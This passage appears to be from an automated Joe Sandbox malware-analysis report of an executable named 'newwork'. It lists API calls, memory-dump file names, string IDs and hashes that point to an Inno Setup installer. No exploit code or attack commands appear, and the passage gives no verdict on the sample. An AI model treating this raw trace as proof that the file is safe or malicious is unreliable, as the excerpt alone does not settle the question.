                                                                                • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                                                • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                                                • FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                                                • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                                                • API String ID: 2323315520-3614243559
                                                                                • Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                • Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
                                                                                • Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                                                • Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0045862F
                                                                                • QueryPerformanceCounter.KERNEL32(021A3858,00000000,004588C2,?,?,021A3858,00000000,?,00458FBE,?,021A3858,00000000), ref: 00458638
                                                                                • GetSystemTimeAsFileTime.KERNEL32(021A3858,021A3858), ref: 00458642
                                                                                • GetCurrentProcessId.KERNEL32(?,021A3858,00000000,004588C2,?,?,021A3858,00000000,?,00458FBE,?,021A3858,00000000), ref: 0045864B
                                                                                • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
                                                                                • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,021A3858,021A3858), ref: 004586CF
                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
                                                                                • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
                                                                                  • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
                                                                                • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
                                                                                • CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
                                                                                  • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                • API String ID: 770386003-3271284199
                                                                                • Opcode ID: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                • Instruction ID: 54c9584e853abf465b9d0f30fdd509929e5717807e8393d963d4681616065440
                                                                                • Opcode Fuzzy Hash: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                                                • Instruction Fuzzy Hash: 19710470A003449EDB11EB65CC45B9E77F4EB05705F1085BAF904FB282DB7899488F69
                                                                                APIs
                                                                                  • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,021A2BDC,?,?,?,021A2BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                  • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                  • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021A2BDC,?,?,?,021A2BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                  • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021A2BDC,?,?,?,021A2BDC), ref: 004783CC
                                                                                  • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,021A2BDC,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                  • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,021A2BDC,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
                                                                                • ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
                                                                                • GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
                                                                                • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
                                                                                • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
                                                                                • CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                                                • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                • API String ID: 883996979-221126205
                                                                                • Opcode ID: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                • Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
                                                                                • Opcode Fuzzy Hash: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                                                • Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
                                                                                APIs
                                                                                • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
                                                                                • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendShowWindow
                                                                                • String ID:
                                                                                • API String ID: 1631623395-0
                                                                                • Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                • Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
                                                                                • Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                                                • Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 00418393
                                                                                • GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
                                                                                • GetWindowRect.USER32(?), ref: 004183CC
                                                                                • GetWindowLongA.USER32(?,000000F0), ref: 004183DA
                                                                                • GetWindowLongA.USER32(?,000000F8), ref: 004183EF
                                                                                • ScreenToClient.USER32(00000000), ref: 004183F8
                                                                                • ScreenToClient.USER32(00000000,?), ref: 00418403
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                • String ID: ,
                                                                                • API String ID: 2266315723-3772416878
                                                                                • Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                • Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
                                                                                • Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                                                • Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                                                • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                                                • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
                                                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
                                                                                • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
                                                                                • ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                • String ID: SeShutdownPrivilege
                                                                                • API String ID: 107509674-3733053543
                                                                                • Opcode ID: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                • Instruction ID: 23182b732e3c774e917f784577cc733395bd6f0e504c2650860deaf78f25ff04
                                                                                • Opcode Fuzzy Hash: e41b2ce6836bec360355d7b24c2a1717b910cfd1a437749fc580c6f152555136
                                                                                • Instruction Fuzzy Hash: CBF0C870294B41B9EA10A6718C17F3B21C89B40709F80083ABD05E90D3D7BDD40C4A2E
                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(10000000,ISCryptGetVersion), ref: 0045D191
                                                                                • GetProcAddress.KERNEL32(10000000,ArcFourInit), ref: 0045D1A1
                                                                                • GetProcAddress.KERNEL32(10000000,ArcFourCrypt), ref: 0045D1B1
                                                                                • ISCryptGetVersion._ISCRYPT(10000000,ArcFourCrypt,10000000,ArcFourInit,10000000,ISCryptGetVersion,?,0047F96F,00000000,0047F998), ref: 0045D1D6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$CryptVersion
                                                                                • String ID: ArcFourCrypt$ArcFourInit$ISCryptGetVersion
                                                                                • API String ID: 1951258720-508647305
                                                                                • Opcode ID: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                • Instruction ID: d394b6b565b4a55a8c16e24b867b534ad65140704dc94b035c924c7661ebf9a3
                                                                                • Opcode Fuzzy Hash: dc81785b55ac876962535e0a2eb36b1dd730d24c9132c457d47d12d4ae2e21c2
                                                                                • Instruction Fuzzy Hash: A2F030B0D41700CAD318EFF6AC957263B96EB9830AF14C03BA414C51A2D7794454DF2C
                                                                                APIs
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0,?,?,00000000,0049B628), ref: 004980FB
                                                                                • SetFileAttributesA.KERNEL32(00000000,00000010), ref: 0049817E
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000), ref: 00498196
                                                                                • FindClose.KERNEL32(000000FF,004981C1,004981BA,?,00000000,?,00000000,004981E2,?,?,00000000,0049B628,?,0049836C,00000000,004983C0), ref: 004981B4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$AttributesCloseFirstNext
                                                                                • String ID: isRS-$isRS-???.tmp
                                                                                • API String ID: 134685335-3422211394
                                                                                • Opcode ID: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                • Instruction ID: fc6fb5a4e2302b333323d0d019d05182e8323e6fc1a1653111c694b95695a562
                                                                                • Opcode Fuzzy Hash: 4cf053d52b7de9e99314ef9443aa0be7ff49bfb1b7c6e14e5d4b85c56af708b1
                                                                                • Instruction Fuzzy Hash: E1316A719016186FCF10EF69CC42ADEBBBCDB45314F5044BBA808E3291DA3C9F458E58
                                                                                APIs
                                                                                • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457611
                                                                                • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00457638
                                                                                • SetForegroundWindow.USER32(?), ref: 00457649
                                                                                • NtdllDefWindowProc_A.USER32(00000000,?,?,?,00000000,00457921,?,00000000,0045795D), ref: 0045790C
                                                                                Strings
                                                                                • Cannot evaluate variable because [Code] isn't running yet, xrefs: 0045778C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: MessagePostWindow$ForegroundNtdllProc_
                                                                                • String ID: Cannot evaluate variable because [Code] isn't running yet
                                                                                • API String ID: 2236967946-3182603685
                                                                                • Opcode ID: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                • Instruction ID: 8776962154e21e4b1c8854f5ca4bcfaa90dd950cda3ad59ac2e2fede597431d6
                                                                                • Opcode Fuzzy Hash: 74e42c9c2b67fd5adc195c0662b506aaf6a0f02139eddaf5114ff9c1448628c8
                                                                                • Instruction Fuzzy Hash: 2B91D334608204DFEB15CF55E991F5ABBF5EB89704F2184BAE80497792C638AE04DB68
                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,GetDiskFreeSpaceExA,00000000,00455F4B), ref: 00455E3C
                                                                                • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00455E42
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: AddressHandleModuleProc
                                                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                • API String ID: 1646373207-3712701948
                                                                                • Opcode ID: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                • Instruction ID: d81c9a8c7c52065d28d66f53e81ce4f313aa74f068c2efe820cb9bfc493487ae
                                                                                • Opcode Fuzzy Hash: 409835b603e199d4170178d82c1615a1651ba94ec2cafac24c158ef3a131e909
                                                                                • Instruction Fuzzy Hash: B0418671A04649AFCF01EFA5C8929EEB7B8EF48305F504567F804F7292D67C5E098B68
                                                                                APIs
                                                                                • IsIconic.USER32(?), ref: 00417D0F
                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000014,?), ref: 00417D2D
                                                                                • GetWindowPlacement.USER32(?,0000002C), ref: 00417D63
                                                                                • SetWindowPlacement.USER32(?,0000002C,?,0000002C), ref: 00417D8A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Placement$Iconic
                                                                                • String ID: ,
                                                                                • API String ID: 568898626-3772416878
                                                                                • Opcode ID: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                • Instruction ID: e85585575f8c5a3e7823c55acc6b28d6d187d41511fbfc80546af44b70413e2d
                                                                                • Opcode Fuzzy Hash: b31359e3e3f4af84bc1879df8bb30ee95a40fb82c66b770674b351632ff57231
                                                                                • Instruction Fuzzy Hash: 4C2112716042089BDF10EF69D8C1AEA77B8AF48314F05456AFD18DF346D678DD84CBA8
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001,00000000,0046433F), ref: 004641CD
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 00464213
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642C8
                                                                                • FindClose.KERNEL32(000000FF,004642F3,004642EC,?,00000000,?,00000000,0046430A,?,00000001,00000000,0046433F), ref: 004642E6
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$CloseErrorFirstModeNext
                                                                                • String ID:
                                                                                • API String ID: 4011626565-0
                                                                                • Opcode ID: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                • Instruction ID: 9d9184480f8630aada0b530c6bd54f2fc26159d28d851f3c8c43bf9f92f270d6
                                                                                • Opcode Fuzzy Hash: 1efd1e5842b6513eb7f92915edfbe8fc84401e145746a4d83abe9154eb57289a
                                                                                • Instruction Fuzzy Hash: 77418370A00A18DBCF10EFA5DC959DEB7B8EB88305F5044AAF804A7341E7789E448E59
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001,00000000,00463E99), ref: 00463D0D
                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463D9C
                                                                                • FindNextFileA.KERNEL32(000000FF,?,00000000,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E2E
                                                                                • FindClose.KERNEL32(000000FF,00463E55,00463E4E,?,00000000,?,00000000,00463E6C,?,00000001,00000000,00463E99), ref: 00463E48
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2568964374.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570358063.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2570407504.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_400000_newwork.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$CloseErrorFirstModeNext
                                                                                • String ID:
                                                                                • API String ID: 4011626565-0
                                                                                • Opcode ID: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                • Instruction ID: 85e7d80bc36d7b3e80fea797042c039a90a2821ca6a16b1e557570abf42aa49f
                                                                                • Opcode Fuzzy Hash: 7f0cfbd2c28eb096c2c7b79ad6d01cc7699265dce8ba217153498c446e9855ae
                                                                                • Instruction Fuzzy Hash: 3A41B770A00A589FCB11EF65CC45ADEB7B8EB88705F4044BAF404A7381E67D9F48CE59
                                                                                APIs
                                                                                • CreateFileA.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E956
                                                                                • DeviceIoControl.KERNEL32(00000000,0009C040,?,00000002,00000000,00000000,?,00000000), ref: 0042E981
                                                                                • GetLastError.KERNEL32(00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E98E
                                                                                • CloseHandle.KERNEL32(00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E996
                                                                                • SetLastError.KERNEL32(00000000,00000000,00000000,C0000000,00000001,00000000,00000003,02000000,00000000,?,?,?,?,00452F3F,00000000,00452F60), ref: 0042E99C
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.2567429000.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.2567388747.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                • Associated: 00000001.00000002.2567997191.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
